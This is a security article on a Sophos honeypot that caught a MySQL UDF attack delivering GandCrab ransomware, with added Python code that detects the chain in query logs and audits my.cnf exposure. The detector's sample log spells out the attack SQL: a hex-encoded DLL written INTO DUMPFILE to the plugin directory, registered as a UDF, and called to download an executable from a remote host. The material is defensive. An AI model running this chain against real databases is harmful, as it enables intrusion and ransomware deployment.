Security researchers set up a honeypot that emulated an exposed, insecure MySQL server and watched an attacker use it to deliver GandCrab ransomware.
Sophos published details of the attack, in which an internet-facing honeypot emulating a MySQL server was exposed on the default port, 3306/tcp. Although the emulated database system was running on Linux, this did not stop the attacker from pushing a Windows executable to it in an attempt to install the ransomware.
According to the report, the attacker first used SQL statements to write a small helper DLL onto the target server, then registered that DLL as a database function (MySQL's user-defined function, or UDF, mechanism) and called it to retrieve the GandCrab ransomware payload from a remote system under the attacker's control. Everything happens over the database protocol itself, so the only thing the attacker needed was a MySQL login with enough privilege to write files and create functions.
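The chain described above leaves a distinctive trail in MySQL's general query log: a hex literal beginning with the PE `MZ` header, a `SELECT ... INTO DUMPFILE` that drops it into the plugin directory, a `CREATE FUNCTION ... SONAME` that loads it, and a call to the new function with a URL argument. The following detector is an added example written for this page, not code from Sophos or from the report; the log lines, client address, file names and the function name `dl_exec` are constructed and hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample in MySQL general_log format (Time  Id  Command  Argument).
# Thread 12 is the hypothetical attacker session; thread 13 is benign traffic.
SAMPLE_LOG = r"""
2019-05-20T09:12:01.120Z    12 Connect   root@203.0.113.7 on  using TCP/IP
2019-05-20T09:12:01.301Z    12 Query     SET @a=concat('',0x4D5A90000300000004000000FFFF0000)
2019-05-20T09:12:01.402Z    12 Query     CREATE TABLE stage(data LONGBLOB)
2019-05-20T09:12:01.510Z    12 Query     INSERT INTO stage VALUES(@a)
2019-05-20T09:12:01.612Z    12 Query     SELECT data FROM stage INTO DUMPFILE 'C:\Program Files\MySQL\lib\plugin\helper.dll'
2019-05-20T09:12:01.720Z    12 Query     CREATE FUNCTION dl_exec RETURNS STRING SONAME 'helper.dll'
2019-05-20T09:12:01.835Z    12 Query     SELECT dl_exec('http://198.51.100.9/payload.exe','C:\Users\Public\p.exe')
2019-05-20T09:13:44.001Z    13 Query     SELECT id, name FROM customers WHERE id = 42
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")

# Each stage of the UDF loading technique, matched independently per query.
STAGE_PATTERNS = {
    "pe_hex_literal": re.compile(r"0x4d5a", re.I),            # 'MZ' header as a hex literal
    "dumpfile_write": re.compile(r"\bINTO\s+DUMPFILE\b", re.I),  # raw file write from a SELECT
    "udf_create": re.compile(
        r"\bCREATE\s+FUNCTION\s+(?P<fn>\w+)\s+RETURNS\s+\w+\s+SONAME\b", re.I),
}
URL_RE = re.compile(r"https?://", re.I)


def parse_general_log(text):
    """Return one dict per well-formed log line; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def detect_udf_chain(text):
    """Group queries by connection thread and flag threads that both stage a
    library on disk and register it as a UDF. Returns a list of alert dicts."""
    per_thread = defaultdict(lambda: {"stages": set(), "udf_names": set(), "client": None})
    for ev in parse_general_log(text):
        t = per_thread[ev["thread"]]
        if ev["cmd"] == "Connect":
            t["client"] = ev["arg"].split(" on")[0]   # "user@host" prefix
            continue
        if ev["cmd"] != "Query":
            continue
        q = ev["arg"]
        for stage, pat in STAGE_PATTERNS.items():
            m = pat.search(q)
            if m:
                t["stages"].add(stage)
                if stage == "udf_create":
                    t["udf_names"].add(m.group("fn").lower())
        # A call to a function this thread itself created, with a URL argument,
        # is the download step of the chain.
        for fn in t["udf_names"]:
            if re.search(r"\b" + re.escape(fn) + r"\s*\(", q, re.I) and URL_RE.search(q):
                t["stages"].add("udf_called_with_url")

    alerts = []
    for thread, t in sorted(per_thread.items()):
        if "udf_create" in t["stages"] and t["stages"] & {"dumpfile_write", "pe_hex_literal"}:
            alerts.append({
                "thread": thread,
                "client": t["client"],
                "udf_names": sorted(t["udf_names"]),
                "stages": sorted(t["stages"]),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_udf_chain(SAMPLE_LOG):
        print(f"thread {a['thread']} from {a['client']}: UDF {a['udf_names']} stages {a['stages']}")
```

Requiring both the file-write stage and the `CREATE FUNCTION ... SONAME` stage on the same connection keeps legitimate UDF installs by an administrator (no hex blob, no DUMPFILE into the plugin directory) from firing the alert on their own.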
One lesson from the attack is that administrators should use firewalls to block internet access to their database servers on the default port, 3306/tcp.
Database access should be limited to trusted systems and networks, and the port should never be left open to the whole internet. Restricting the port is necessary but not sufficient: the same UDF technique works from any network that can reach the server, so strong credentials, a service account that cannot write to the plugin directory, and a `secure_file_priv` setting that keeps `SELECT ... INTO DUMPFILE` out of that directory matter just as much.
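The server-side half of that advice can be checked from `my.cnf` alone. The audit below is an added example for this page, not code from Sophos; the two configuration fragments are constructed, and the trusted network ranges and finding codes are hypothetical choices. It flags a listener bound to all interfaces or to an address outside the trusted ranges, an empty `secure_file_priv` (which lifts all restrictions on where `INTO DUMPFILE` may write), and a `plugin_dir` that lies inside the `secure_file_priv` directory.

```python
import ipaddress
import posixpath

# Constructed weak configuration: listens everywhere, no file-write restriction.
WEAK_CNF = """\
[mysqld]
port=3306
bind-address=0.0.0.0
secure_file_priv=
plugin_dir=/usr/lib/mysql/plugin
"""

# Constructed hardened counterpart: internal address only, DUMPFILE confined to
# a directory that does not contain the plugin directory.
HARDENED_CNF = """\
[mysqld]
port=3306
bind-address=10.0.5.12
secure_file_priv=/var/lib/mysql-files
plugin_dir=/usr/lib/mysql/plugin
"""

TRUSTED_NETWORKS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]


def parse_mysqld_section(text):
    """Return the key=value options of the [mysqld] section, with '-' normalised
    to '_' as the server itself accepts either spelling."""
    options, in_section = {}, False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("["):
            in_section = line.lower() == "[mysqld]"
            continue
        if in_section:
            key, _, value = line.partition("=")
            options[key.strip().lower().replace("-", "_")] = value.strip().strip("'\"")
    return options


def audit_exposure(text, trusted=TRUSTED_NETWORKS):
    """Return a list of (code, message) findings for the given my.cnf text."""
    cfg = parse_mysqld_section(text)
    findings = []

    if "skip_networking" not in cfg:
        bind = cfg.get("bind_address", "*")   # absent means all interfaces
        if bind in ("*", "0.0.0.0", "::"):
            findings.append(("BIND_ALL_INTERFACES",
                             f"bind_address={bind!r} exposes port {cfg.get('port', '3306')} on every interface"))
        else:
            addr = ipaddress.ip_address(bind)
            if not addr.is_loopback and not any(addr in net for net in trusted):
                findings.append(("BIND_UNTRUSTED_ADDRESS",
                                 f"bind_address={bind} is outside the trusted networks"))

    if "secure_file_priv" in cfg:
        sfp = cfg["secure_file_priv"]
        if sfp == "":
            findings.append(("SECURE_FILE_PRIV_UNRESTRICTED",
                             "secure_file_priv is empty: INTO DUMPFILE may write anywhere mysqld can"))
        elif sfp.upper() != "NULL" and "plugin_dir" in cfg:
            base = posixpath.normpath(sfp)
            plugin = posixpath.normpath(cfg["plugin_dir"])
            if plugin == base or plugin.startswith(base.rstrip("/") + "/"):
                findings.append(("DUMPFILE_REACHES_PLUGIN_DIR",
                                 f"plugin_dir {plugin} lies inside secure_file_priv {base}"))
    return findings


if __name__ == "__main__":
    for name, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(name, audit_exposure(cnf) or "no findings")
```

`secure_file_priv` can only be set in the configuration file, not at runtime, so a finding here means a restart is needed; the firewall rule that keeps 3306/tcp off the internet is still the first control to apply.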